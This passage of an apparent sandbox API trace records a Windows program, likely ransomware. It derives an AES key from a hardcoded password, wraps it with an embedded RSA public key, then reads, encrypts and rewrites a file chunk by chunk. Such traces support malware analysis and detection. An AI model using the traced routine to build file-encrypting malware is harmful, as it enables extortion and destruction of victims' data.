dwFileAttributes=0x2) returned 1 [0245.842] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28f6348) returned 1 [0245.845] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0245.846] lstrlenA (lpString="HaeWBZzBmncRlrEejByhMRXAzMlQm") returned 29 [0245.846] CryptHashData (hHash=0x28e7978, pbData=0x28570d8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0245.846] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e7978, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28e7df8) returned 1 [0245.846] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0245.846] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0245.846] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28f59b8) returned 1 [0245.846] CryptImportPublicKeyInfo (in: hCryptProv=0x28f59b8, dwCertEncodingType=0x1, pInfo=0x29367c0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29367f0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29367f8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x2938738) returned 1 [0245.846] CryptEncrypt (in: hKey=0x2938738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0245.847] CryptEncrypt (in: hKey=0x2938738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f5930*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28f5930*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0245.847] WriteFile (in: hFile=0x5d3c, lpBuffer=0x28f5930*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x28f5930*, lpNumberOfBytesWritten=0x2b9d5a0*=0x80, lpOverlapped=0x0) returned 1 [0245.848] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.850] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.850] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.010] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.010] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.010] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.011] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.011] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.011] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.011] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.011] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.011] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.011] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.011] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.011] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.011] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.011] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.011] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.011] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.011] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.011] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.011] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.012] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.012] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.012] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.012] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.012] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.012] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.012] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.012] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.012] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.012] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.012] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.012] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.013] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.013] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.013] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.013] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.013] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.013] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.013] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.013] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.013] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.013] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.013] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.013] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.013] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.014] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.014] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.014] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.014] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.014] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.014] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.014] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.014] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.014] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.014] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.014] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.014] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.014] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.015] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.015] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.015] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.015] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.015] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.015] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.015] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.015] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.015] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.015] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.015] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.015] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.016] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.016] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.016] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.016] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.016] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.016] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.016] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.016] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.016] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.016] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.016] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.016] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.016] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.016] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.016] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.017] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 